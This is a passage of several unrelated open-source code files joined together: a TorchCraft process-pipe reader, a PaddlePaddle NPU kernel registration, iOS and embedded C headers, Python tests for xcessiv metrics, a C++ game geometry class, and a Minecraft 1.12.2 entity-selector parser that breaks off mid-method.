fcntl(fork_.fd, F_SETFL, flags);
struct pollfd pfd;
pfd.fd = fork_.fd;
pfd.events = POLLIN;
int numTimedoutPolls = 0;
while (running_.load()) {
// Check if child process is still alive
if (kill(fork_.pid, 0) != 0 && errno == ESRCH) {
VLOG(1) << "BWAPILauncher(" << fork_.pid << ") is gone";
if (!readSocket) {
goodp_.set_exception(std::make_exception_ptr(std::runtime_error(
"BWAPILauncher(" + std::to_string(fork_.pid) +
") died prematurely")));
}
break;
}
// Poll for new data on pipe
auto pret = poll(&pfd, 1, kPollTimeout);
if (pret < 0) {
if (errno == EINTR) {
VLOG(4) << "Polling was interrupted";
continue;
}
LOG(ERROR) << "Error polling BWAPILauncher pipe: "
<< google::StrError(errno);
if (!readSocket) {
goodp_.set_exception(std::make_exception_ptr(
std::runtime_error("Error reading BWAPILauncher output")));
}
break;
} else if (pret == 0) {
VLOG(4) << "Poll timeout";
if (++numTimedoutPolls >= kMaxTimedoutPolls && !readSocket) {
goodp_.set_exception(std::make_exception_ptr(
std::runtime_error("Timeout parsing BWAPILauncher output")));
break;
}
continue;
} else if (!(pfd.revents & POLLIN)) {
VLOG(4) << "No data available";
continue;
}
numTimedoutPolls = 0;
// Process each line individually for convenience
char sockPath[4096];
auto readline = [&](char const* line) {
if (!strncasecmp(line, "Error:", 6)) {
LOG(ERROR) << "BWAPILauncher(" << fork_.pid << "): " << line;
} else {
VLOG(2) << "BWAPILauncher(" << fork_.pid << "): " << line;
}
if (!readSocket &&
std::sscanf(
line, "TorchCraft server listening on socket %s", sockPath) > 0) {
goodp_.set_value();
readSocket = true;
}
};
// Read available data
ssize_t nread = 0;
while (true) {
nread = read(fork_.fd, buf.data(), buf.size());
if (nread <= 0) {
break;
}
ssize_t pos = 0;
while (pos < nread) {
if (lpos >= linebuf.size()) {
linebuf.resize(linebuf.size() + buf.size());
}
if (buf[pos] == '\n') {
linebuf[lpos] = '\0';
readline(linebuf.data());
lpos = 0;
pos++;
} else {
linebuf[lpos++] = buf[pos++];
}
}
}
if (nread < 0 && errno != EAGAIN) {
LOG(ERROR) << "Error reading from BWAPILauncher pipe: " << errno;
if (!readSocket) {
goodp_.set_exception(std::make_exception_ptr(std::system_error(
errno,
std::system_category(),
"Error reading BWAPILauncher output")));
}
break;
} else if (nread == 0) {
VLOG(2) << "EOF while reading from BWAPILauncher pipe";
break;
} else if (readSocket && std::string(sockPath) != socketPath_) {
goodp_.set_exception(
std::make_exception_ptr(std::runtime_error(fmt::format(
"Expected socket path {}, got {}", socketPath_, sockPath))));
break;
}
}
#endif
}
void OpenBwProcess::preventFurtherProcesses() {
isExiting = true;
}
} // namespace cherrypi
| 5,062 |
17,085 | /* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#include "paddle/fluid/operators/randperm_op.h"
#include "paddle/fluid/framework/op_registry.h"
template <typename T>
using kernel =
paddle::operators::RandpermKernel<paddle::platform::NPUDeviceContext, T>;
REGISTER_OP_NPU_KERNEL(randperm, kernel<int64_t>, kernel<int>, kernel<float>,
kernel<double>);
| 291 |
483 | <reponame>anharismail/EasyNavigation
//
// NavSystemSlidingViewController.h
// EasyNavigationDemo
//
// Created by Mr_Chen on 17/9/15.
// Copyright © 2017 chenliangloveyou. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface NavSystemSlidingViewController : UIViewController
@end
| 106 |
4,538 | <gh_stars>1000+
/*
* Copyright (C) 2015-2020 Alibaba Group Holding Limited
*/
#ifndef DIGITAL_OUTPUT_H
#define DIGITAL_OUTPUT_H
#include "stdint.h"
#include "aos/hal/gpio.h"
enum en_do_port {
DO_PORT_0 = 0,
DO_PORT_1,
DO_PORT_2,
DO_PORT_3,
DO_PORT_SIZE
};
int32_t expansion_board_do_init(void);
int32_t expansion_board_do_high(uint8_t port);
int32_t expansion_board_do_low(uint8_t port);
#endif | 196 |
1,362 | <gh_stars>1000+
from __future__ import absolute_import, print_function, division, unicode_literals
import unittest
import numpy as np
from sklearn.datasets import load_iris, load_breast_cancer, load_boston
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.model_selection import cross_val_predict
from xcessiv import functions
from xcessiv.presets import metricsetting
clf = LogisticRegression(random_state=8)
multiclass_X, multiclass_y = load_iris(return_X_y=True)
multiclass_preds = cross_val_predict(clf, multiclass_X, multiclass_y, method='predict')
multiclass_probas = cross_val_predict(clf, multiclass_X, multiclass_y, method='predict_proba')
binary_X, binary_y = load_breast_cancer(return_X_y=True)
binary_preds = cross_val_predict(clf, binary_X, binary_y, method='predict')
binary_probas = cross_val_predict(clf, binary_X, binary_y, method='predict_proba')
regression_X, regression_y = load_boston(return_X_y=True)
reg = LinearRegression()
regression_preds = cross_val_predict(reg, regression_X, regression_y, method='predict')
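# Each test below imports a preset metric's source string as a module and checks its
# value against the fixed cross-validated predictions computed above.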
class TestAccuracyFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.accuracy_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestAccuracyFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.accuracy_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestRecallFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.recall_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.97
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestRecallFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.recall_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.97
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestPrecisionFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.precision_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestPrecisionFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.precision_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestF1ScoreFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.f1_score_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.96
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestF1ScoreFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.f1_score_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.96
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestROCAUCFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(
metricsetting.roc_auc_score_from_scores['source']
)
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.99
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.99
del module
class TestMAE(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.mae['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == 6.99
del module
class TestMSE(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.mse['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == 168.09
del module
class TestMedianAbsoluteError(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.median_absolute_error['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == 3.72
del module
class TestR2Score(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.r2_score['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == -0.99
del module
class TestExplainedVarianceScore(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.explained_variance_score['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == -0.89
del module
| 2,290 |
428 | <filename>src/cpp/f00295_gamegeom.hpp
class GameGeom {
private:
// passed to GPU, transformed
FIVector4 boundsMinInPixels;
FIVector4 boundsMaxInPixels;
FIVector4 visMinInPixels;
FIVector4 visMaxInPixels;
public:
// passed to GPU
FIVector4 geomParams[E_GP_LENGTH];
// enum E_GEOM_PARAMS {
// E_GP_BOUNDSMININPIXELST,
// E_GP_BOUNDSMAXINPIXELST,
// E_GP_VISMININPIXELST,
// E_GP_VISMAXINPIXELST,
// E_GP_CORNERDISINPIXELS,
// E_GP_POWERVALS,
// E_GP_POWERVALS2,
// E_GP_THICKVALS,
// E_GP_MATPARAMS,
// E_GP_LENGTH
// }
// geomParams[E_GP_BOUNDSMININPIXELST]
// geomParams[E_GP_BOUNDSMAXINPIXELST]
// geomParams[E_GP_VISMININPIXELST]
// geomParams[E_GP_VISMAXINPIXELST]
// geomParams[E_GP_CORNERDISINPIXELS]
// geomParams[E_GP_POWERVALS]
// geomParams[E_GP_POWERVALS2]
// geomParams[E_GP_THICKVALS]
// geomParams[E_GP_MATPARAMS]
// FIVector4 boundsMinInPixelsT;
// FIVector4 boundsMaxInPixelsT;
// FIVector4 visMinInPixelsT;
// FIVector4 visMaxInPixelsT;
// FIVector4 cornerDisInPixels;
// FIVector4 powerVals;
// FIVector4 powerVals2;
// FIVector4 thickVals;
// FIVector4 matParams;
// internal use
FIVector4 anchorPointInPixels;
FIVector4 moveMinInPixels;
FIVector4 moveMaxInPixels;
GameLight *light;
bool visible;
bool hasAnchor;
bool isToggled;
// 1
// 2 0
// 3
int rotDir;
int minRot;
int maxRot;
int curRot;
int buildingType;
int id;
int globalId;
//float minRad;
//float maxRad;
//float matId;
GameGeom() {
light = NULL;
}
void init(int _id) {
id = _id;
}
FIVector4 tempVec1;
FIVector4 tempVec2;
FIVector4 tempVec3;
FIVector4 *getBoundsMinInPixels() {
return &boundsMinInPixels;
}
FIVector4 *getBoundsMaxInPixels() {
return &boundsMaxInPixels;
}
FIVector4 *getVisMinInPixels() {
return &visMinInPixels;
}
FIVector4 *getVisMaxInPixels() {
return &visMaxInPixels;
}
FIVector4 *getBoundsMinInPixelsT() {
return &geomParams[E_GP_BOUNDSMININPIXELST];
}
FIVector4 *getBoundsMaxInPixelsT() {
return &geomParams[E_GP_BOUNDSMAXINPIXELST];
}
FIVector4 *getVisMinInPixelsT() {
// TODO: make this more efficient and use pixelsPerMeter
// tempVec1.copyFrom(&geomParams[E_GP_VISMININPIXELST]);
// tempVec1.addXYZ(pixelsPerMeter);
// return &tempVec1;
return &geomParams[E_GP_VISMININPIXELST];
}
FIVector4 *getVisMaxInPixelsT() {
return &geomParams[E_GP_VISMAXINPIXELST];
}
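    // Returns curRot wrapped into the range [0, 3].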
int getClampedRot() {
int tempRot = curRot;
while (tempRot < 0) {
tempRot += 4;
}
while (tempRot > 3) {
tempRot -= 4;
}
return tempRot;
}
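    // Rotates by mod steps about the anchor; unless ignoreConstraints is set, the
    // rotation bounces back and forth between minRot and maxRot.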
void rotate(int mod, bool ignoreConstraints) {
if (hasAnchor) {
curRot += mod;
if (ignoreConstraints) {
if (curRot > 3) {
curRot = 0;
}
if (curRot < 0) {
curRot = 3;
}
}
else {
if (curRot > maxRot) {
curRot = maxRot - 1;
rotDir *= -1;
}
if (curRot < minRot) {
curRot = minRot + 1;
rotDir *= -1;
}
}
}
else {
cout << "Attemped to rotate without anchor.\n";
}
}
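    // Builds a box geometry: bounds grown by rad, aligned vertically per
    // alignBottomMiddleTop, visible bounds inset, and an optional rotation anchor.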
void initBounds(
int _buildingType,
int _id,
int _globalId,
int alignBottomMiddleTop,
float _zOffset,
FIVector4 *p1,
FIVector4 *p2,
FIVector4 *rad,
FIVector4 *_cornerDisInPixels,
FIVector4 *_visInsetFromMin,
FIVector4 *_visInsetFromMax,
FIVector4 *_powerVals,
FIVector4 *_powerVals2,
FIVector4 *_thickVals,
FIVector4 *_matParams,
FIVector4 *_centerPoint,
FIVector4 *_anchorPoint,
int _minRot,
int _maxRot
) {
buildingType = _buildingType;
id = _id;
globalId = _globalId;
float temp;
float zOffset = _zOffset;
isToggled = false;
curRot = 0;
rotDir = 1;
visible = true;
hasAnchor = false;
anchorPointInPixels.setFXYZ(0.0f, 0.0f, 0.0f);
boundsMinInPixels.setFXYZRef(p1);
boundsMaxInPixels.setFXYZRef(p2);
FIVector4::normalizeBounds(&boundsMinInPixels, &boundsMaxInPixels);
boundsMinInPixels.addXYZRef(rad, -1.0f);
boundsMaxInPixels.addXYZRef(rad, 1.0f);
switch (alignBottomMiddleTop) {
case E_ALIGN_BOTTOM: // bottom _@_
zOffset += (rad->getFZ() - _visInsetFromMin->getFZ());
break;
case E_ALIGN_MIDDLE: // middle -@-
zOffset += 0.0f;
break;
// ___
case E_ALIGN_TOP: // top @
zOffset += -(rad->getFZ() - _visInsetFromMax->getFZ());
break;
}
boundsMinInPixels.addXYZ(0.0f, 0.0f, zOffset);
boundsMaxInPixels.addXYZ(0.0f, 0.0f, zOffset);
visMinInPixels.setFXYZRef(&boundsMinInPixels);
visMaxInPixels.setFXYZRef(&boundsMaxInPixels);
visMinInPixels.addXYZRef(_visInsetFromMin, 1.0f);
visMaxInPixels.addXYZRef(_visInsetFromMax, -1.0f);
geomParams[E_GP_CORNERDISINPIXELS].setFXYZRef(_cornerDisInPixels);
geomParams[E_GP_POWERVALS].setFXYZRef(_powerVals);
geomParams[E_GP_POWERVALS2].setFXYZRef(_powerVals2);
geomParams[E_GP_THICKVALS].setFXYZRef(_thickVals);
geomParams[E_GP_MATPARAMS].setFXYZRef(_matParams);
geomParams[E_GP_CENTERPOINT].setFXYZRef(_centerPoint);
moveMinInPixels.setFXYZRef(&boundsMinInPixels);
moveMaxInPixels.setFXYZRef(&boundsMaxInPixels);
geomParams[E_GP_BOUNDSMININPIXELST].setFXYZRef(&boundsMinInPixels);
geomParams[E_GP_BOUNDSMAXINPIXELST].setFXYZRef(&boundsMaxInPixels);
geomParams[E_GP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_GP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
if (_minRot != _maxRot) {
initAnchorPoint(_anchorPoint, _minRot, _maxRot);
}
}
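    // Builds a segment geometry from origin/tangent/radius vectors; the bounds are the
    // scaled segment grown by the largest radius component.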
void initLines(
int _buildingType,
int _id,
int _globalId,
float scale,
FIVector4 *_offset,
FIVector4 *_orgVec,
FIVector4 *_tanVec, // already scaled
FIVector4 *_bitVec,
FIVector4 *_norVec,
FIVector4 *_radVec0,
FIVector4 *_radVec1,
FIVector4 *_radVecScale0,
FIVector4 *_radVecScale1,
FIVector4 *_matParams
) {
buildingType = _buildingType;
id = _id;
globalId = _globalId;
float temp;
float radMax;
curRot = 0;
rotDir = 1;
visible = true;
hasAnchor = false;
anchorPointInPixels.setFXYZ(0.0f, 0.0f, 0.0f);
tempVec1.setFXYZRef(_orgVec);
tempVec2.setFXYZRef(_radVec0);
tempVec3.setFXYZRef(_radVec1);
tempVec2.multXYZ(_radVecScale0);
tempVec3.multXYZ(_radVecScale1);
tempVec1.multXYZ(scale);
tempVec2.multXYZ(scale);
tempVec3.multXYZ(scale);
tempVec1.addXYZRef(_offset);
boundsMinInPixels.setFXYZRef(&tempVec1);
boundsMaxInPixels.setFXYZRef(&tempVec1);
boundsMinInPixels.addXYZRef(_tanVec,-1.0);
boundsMaxInPixels.addXYZRef(_tanVec);
FIVector4::normalizeBounds(&boundsMinInPixels, &boundsMaxInPixels);
radMax = max(
max(
max(tempVec2[0], tempVec2[1]),
max(tempVec3[0], tempVec3[1])
),
max(tempVec2[2], tempVec3[2])
);
boundsMinInPixels.addXYZ(-radMax);
boundsMaxInPixels.addXYZ(radMax);
visMinInPixels.setFXYZRef(&boundsMinInPixels);
visMaxInPixels.setFXYZRef(&boundsMaxInPixels);
moveMinInPixels.setFXYZRef(&boundsMinInPixels);
moveMaxInPixels.setFXYZRef(&boundsMaxInPixels);
geomParams[E_AP_ORG].setFXYZRef(&tempVec1);
geomParams[E_AP_TAN].setFXYZRef(_tanVec);
geomParams[E_AP_BIT].setFXYZRef(_bitVec);
geomParams[E_AP_NOR].setFXYZRef(_norVec);
geomParams[E_AP_RAD0].setFXYZRef(&tempVec2);
geomParams[E_AP_RAD1].setFXYZRef(&tempVec3);
geomParams[E_AP_MATPARAMS].setFXYZRef(_matParams);
geomParams[E_AP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_AP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
}
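    // Builds a tree (curve) geometry from endpoints p0/p1 and control point p2, with
    // bounds grown by the largest of the end and sphere radii.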
void initTree(
int _buildingType,
int _id,
int _globalId,
// p0, p1 = start, end
// p2 = control point or tangent
FIVector4 *p0,
FIVector4 *p1,
FIVector4 *p2,
float radP0,
float radP1,
float sphereRad,
// FIVector4* rad,
// FIVector4* _cornerDisInPixels,
//FIVector4* _visInsetFromMin,
//FIVector4* _visInsetFromMax,
// FIVector4* _powerVals,
// FIVector4* _powerVals2,
// FIVector4* _thickVals,
FIVector4 *_matParams
) {
buildingType = _buildingType;
id = _id;
globalId = _globalId;
float temp;
float radMax = max(max(radP0, radP1), sphereRad);
curRot = 0;
rotDir = 1;
visible = true;
hasAnchor = false;
anchorPointInPixels.setFXYZ(0.0f, 0.0f, 0.0f);
boundsMinInPixels.setFXYZRef(p0);
boundsMaxInPixels.setFXYZRef(p1);
//boundsMinInPixels.addXYZ(-radMax);
//boundsMaxInPixels.addXYZ(radMax);
FIVector4::normalizeBounds(&boundsMinInPixels, &boundsMaxInPixels);
FIVector4::growBoundary(&boundsMinInPixels, &boundsMaxInPixels, p2, p2);
boundsMinInPixels.addXYZ(-radMax);
boundsMaxInPixels.addXYZ(radMax);
visMinInPixels.setFXYZRef(&boundsMinInPixels);
visMaxInPixels.setFXYZRef(&boundsMaxInPixels);
//visMinInPixels.addXYZRef(_visInsetFromMin, 1.0f);
//visMaxInPixels.addXYZRef(_visInsetFromMax, -1.0f);
// geomParams[E_GP_CORNERDISINPIXELS].setFXYZRef(_cornerDisInPixels);
// geomParams[E_GP_POWERVALS].setFXYZRef(_powerVals);
// geomParams[E_GP_POWERVALS2].setFXYZRef(_powerVals2);
geomParams[E_TP_P0].setFXYZRef(p0);
geomParams[E_TP_P1].setFXYZRef(p1);
geomParams[E_TP_P2].setFXYZRef(p2);
geomParams[E_TP_THICKVALS].setFXYZ(radP0, radP1, sphereRad);
geomParams[E_TP_MATPARAMS].setFXYZRef(_matParams);
moveMinInPixels.setFXYZRef(&boundsMinInPixels);
moveMaxInPixels.setFXYZRef(&boundsMaxInPixels);
// geomParams[E_GP_BOUNDSMININPIXELST].setFXYZRef(&boundsMinInPixels);
// geomParams[E_GP_BOUNDSMAXINPIXELST].setFXYZRef(&boundsMaxInPixels);
geomParams[E_TP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_TP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
}
void toggleTransform() {
isToggled = !isToggled;
applyTransform(rotDir, false);
}
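    // Recomputes the transformed GPU bounds: rotate the base bounds about the anchor by
    // the current rotation, then grow the movement bounds to cover the result.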
void applyTransform(int rotMod, bool ignoreConstraints) {
rotate(rotMod, ignoreConstraints);
geomParams[E_GP_BOUNDSMININPIXELST].setFXYZRef(&boundsMinInPixels);
geomParams[E_GP_BOUNDSMAXINPIXELST].setFXYZRef(&boundsMaxInPixels);
geomParams[E_GP_VISMININPIXELST].setFXYZRef(&visMinInPixels);
geomParams[E_GP_VISMAXINPIXELST].setFXYZRef(&visMaxInPixels);
geomParams[E_GP_BOUNDSMININPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_BOUNDSMAXINPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_VISMININPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_VISMAXINPIXELST].addXYZRef(&anchorPointInPixels, -1.0f);
geomParams[E_GP_BOUNDSMININPIXELST].rotate90(getClampedRot());
geomParams[E_GP_BOUNDSMAXINPIXELST].rotate90(getClampedRot());
geomParams[E_GP_VISMININPIXELST].rotate90(getClampedRot());
geomParams[E_GP_VISMAXINPIXELST].rotate90(getClampedRot());
geomParams[E_GP_BOUNDSMININPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
geomParams[E_GP_BOUNDSMAXINPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
geomParams[E_GP_VISMININPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
geomParams[E_GP_VISMAXINPIXELST].addXYZRef(&anchorPointInPixels, 1.0f);
FIVector4::normalizeBounds(&geomParams[E_GP_BOUNDSMININPIXELST], &geomParams[E_GP_BOUNDSMAXINPIXELST]);
FIVector4::normalizeBounds(&geomParams[E_GP_VISMININPIXELST], &geomParams[E_GP_VISMAXINPIXELST]);
FIVector4::growBoundary(&moveMinInPixels, &moveMaxInPixels, &geomParams[E_GP_VISMININPIXELST], &geomParams[E_GP_VISMAXINPIXELST]);
}
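    // Registers the rotation anchor and limits, then applies four single-step rotations
    // so the movement bounds cover every orientation.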
void initAnchorPoint(FIVector4 *_anchorPointInPixels, int _minRot, int _maxRot) {
int i;
hasAnchor = true;
anchorPointInPixels.setFXYZRef(_anchorPointInPixels);
minRot = _minRot;
maxRot = _maxRot;
for (i = 0; i < 4; i++) {
applyTransform(1, true);
}
}
};
| 5,648 |
394 | <gh_stars>100-1000
package net.earthcomputer.multiconnect.protocols.v1_12_2.command.arguments;
import com.mojang.brigadier.LiteralMessage;
import com.mojang.brigadier.StringReader;
import com.mojang.brigadier.arguments.ArgumentType;
import com.mojang.brigadier.context.CommandContext;
import com.mojang.brigadier.exceptions.CommandSyntaxException;
import com.mojang.brigadier.exceptions.DynamicCommandExceptionType;
import com.mojang.brigadier.exceptions.SimpleCommandExceptionType;
import com.mojang.brigadier.suggestion.Suggestions;
import com.mojang.brigadier.suggestion.SuggestionsBuilder;
import net.earthcomputer.multiconnect.api.Protocols;
import net.earthcomputer.multiconnect.impl.ConnectionInfo;
import net.earthcomputer.multiconnect.protocols.v1_10.Protocol_1_10;
import net.earthcomputer.multiconnect.protocols.v1_12_2.TabCompletionManager;
import net.minecraft.command.CommandSource;
import net.minecraft.command.argument.EntitySummonArgumentType;
import net.minecraft.entity.EntityType;
import net.minecraft.util.Identifier;
import net.minecraft.util.registry.Registry;
import java.util.*;
import java.util.concurrent.CompletableFuture;
import java.util.function.Function;
import java.util.stream.Collectors;
import java.util.stream.Stream;
public final class EntityArgumentType_1_12_2 implements ArgumentType<Void> {
private static final Collection<String> EXAMPLES = Arrays.asList("Player", "0123", "@e", "@e[type=foo]", "dd12be42-52a9-4a91-a8a1-11c01849e498");
private static final SimpleCommandExceptionType EXPECTED_SELECTOR_TYPE_EXCEPTION = new SimpleCommandExceptionType(new LiteralMessage("Expected selector type"));
private static final DynamicCommandExceptionType UNKNOWN_OPTION_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Unknown option \"" + arg + "\""));
private static final DynamicCommandExceptionType DUPLICATE_OPTION_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Duplicate option \"" + arg + "\""));
private static final DynamicCommandExceptionType DISALLOWED_OPTION_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Option \"" + arg + "\" is disallowed at this location"));
private static final SimpleCommandExceptionType NO_MULTIPLE_EXCEPTION = new SimpleCommandExceptionType(new LiteralMessage("Cannot match multiple entities here"));
private static final SimpleCommandExceptionType PLAYERS_ONLY_EXCEPTION = new SimpleCommandExceptionType(new LiteralMessage("This selector cannot match players, but only players are allowed"));
private static final DynamicCommandExceptionType EXPECTED_GAMEMODE_EXCEPTION = new DynamicCommandExceptionType(arg -> new LiteralMessage("Expected gamemode, got \"" + arg + "\""));
private static final Map<String, Option> SELECTOR_OPTIONS = new HashMap<>();
private final boolean singleTarget;
private final boolean playersOnly;
private boolean suggestPlayerNames = true;
private EntityArgumentType_1_12_2(boolean singleTarget, boolean playersOnly) {
this.singleTarget = singleTarget;
this.playersOnly = playersOnly;
}
public static EntityArgumentType_1_12_2 players() {
return new EntityArgumentType_1_12_2(false, true);
}
public static EntityArgumentType_1_12_2 onePlayer() {
return new EntityArgumentType_1_12_2(true, true);
}
public static EntityArgumentType_1_12_2 entities() {
return new EntityArgumentType_1_12_2(false, false);
}
public static EntityArgumentType_1_12_2 oneEntity() {
return new EntityArgumentType_1_12_2(true, false);
}
public EntityArgumentType_1_12_2 noSuggestPlayerNames() {
this.suggestPlayerNames = false;
return this;
}
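    // Validation-only parse: accepts either a 1.12.2-style selector such as @e[type=foo]
    // or a bare player name; no argument value is produced.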
@Override
public Void parse(StringReader reader) throws CommandSyntaxException {
if (reader.canRead() && reader.peek() == '@') {
new EntitySelectorParser(reader, singleTarget, playersOnly).parse();
} else {
reader.readUnquotedString();
}
return null;
}
@SuppressWarnings("unchecked")
@Override
public <S> CompletableFuture<Suggestions> listSuggestions(CommandContext<S> context, SuggestionsBuilder builder) {
if (!(context.getSource() instanceof CommandSource))
return builder.buildFuture();
StringReader reader = new StringReader(builder.getInput());
reader.setCursor(builder.getStart());
CompletableFuture<Suggestions> playerCompletions;
if ((reader.canRead() && reader.peek() == '@') || !suggestPlayerNames) {
playerCompletions = Suggestions.empty();
} else {
playerCompletions =
((CommandSource) context.getSource()).getCompletions((CommandContext<CommandSource>) context,
builder.restart());
}
EntitySelectorParser parser = new EntitySelectorParser(reader, singleTarget, playersOnly);
try {
parser.parse();
} catch (CommandSyntaxException ignore) {
}
var selectorCompletions = parser.suggestor.apply(builder.restart());
return CompletableFuture.allOf(playerCompletions, selectorCompletions)
.thenCompose(v -> UnionArgumentType.mergeSuggestions(playerCompletions.join(),
selectorCompletions.join()));
}
@Override
public Collection<String> getExamples() {
return EXAMPLES;
}
private static class EntitySelectorParser {
private final StringReader reader;
private boolean singleTarget;
private boolean playersOnly;
private Function<SuggestionsBuilder, CompletableFuture<Suggestions>> suggestor = SuggestionsBuilder::buildFuture;
private boolean cannotSelectPlayers = false;
private boolean typeKnown = false;
private final Set<String> seenOptions = new HashSet<>();
private boolean hadExplicitOption = false;
public EntitySelectorParser(StringReader reader, boolean singleTarget, boolean playersOnly) {
this.reader = reader;
this.singleTarget = singleTarget;
this.playersOnly = playersOnly;
}
public void parse() throws CommandSyntaxException {
int start = reader.getCursor();
suggestor = builder -> {
builder = builder.createOffset(start);
builder.suggest("@p");
if (!singleTarget)
builder.suggest("@a");
builder.suggest("@r");
if (!playersOnly)
builder.suggest("@e");
if (ConnectionInfo.protocolVersion > Protocols.V1_11_2)
builder.suggest("@s");
return builder.buildFuture();
};
reader.expect('@');
if (!reader.canRead()) {
reader.setCursor(start);
throw EXPECTED_SELECTOR_TYPE_EXCEPTION.createWithContext(reader);
}
switch (reader.read()) {
case 'p':
singleTarget = true;
playersOnly = true;
typeKnown = true;
break;
case 'a':
if (singleTarget) {
reader.setCursor(start);
throw NO_MULTIPLE_EXCEPTION.createWithContext(reader);
}
playersOnly = true;
typeKnown = true;
break;
case 'r':
typeKnown = true;
break;
case 'e':
break;
case 's':
if (ConnectionInfo.protocolVersion <= Protocols.V1_11_2) {
reader.setCursor(start);
throw EXPECTED_SELECTOR_TYPE_EXCEPTION.createWithContext(reader);
}
typeKnown = true;
singleTarget = true;
break;
default:
reader.setCursor(start);
throw EXPECTED_SELECTOR_TYPE_EXCEPTION.createWithContext(reader);
}
int bracketStart = reader.getCursor();
if (!reader.canRead()) {
suggestor = builder -> {
builder = builder.createOffset(bracketStart);
builder.suggest("[");
return builder.buildFuture();
};
return;
}
if (reader.canRead() && reader.peek() == '[') {
reader.skip();
if (reader.canRead() && reader.peek() == ']') {
reader.skip();
} else {
while (true) {
readOption();
if (reader.canRead() && reader.peek() == ',') {
reader.skip();
} else {
reader.expect(']');
break;
}
}
}
}
suggestor = SuggestionsBuilder::buildFuture;
}
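        // Reads a single name=value selector option, including legacy score_* options and
        // the pre-1.11 positional x, y, z, r shorthand.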
private void readOption() throws CommandSyntaxException {
suggestOption();
int start = reader.getCursor();
String optionName = reader.readUnquotedString();
if (!optionName.startsWith("score_") && !SELECTOR_OPTIONS.containsKey(optionName)) {
reader.setCursor(start);
if (ConnectionInfo.protocolVersion <= Protocols.V1_10 && !hadExplicitOption && seenOptions.size() < 4) {
boolean validInteger;
try {
Integer.parseInt(optionName);
validInteger = true;
} catch (NumberFormatException e) {
validInteger = false;
}
if (validInteger) {
reader.readUnquotedString();
if (reader.canRead() && (reader.peek() == ',' || reader.peek() == ']')) {
switch (seenOptions.size()) {
case 0 -> seenOptions.add("x");
case 1 -> seenOptions.add("y");
case 2 -> seenOptions.add("z");
case 3 -> seenOptions.add("r");
}
return;
} else {
reader.setCursor(start);
}
}
}
throw UNKNOWN_OPTION_EXCEPTION.createWithContext(reader, optionName);
}
if (seenOptions.contains(optionName)) {
reader.setCursor(start);
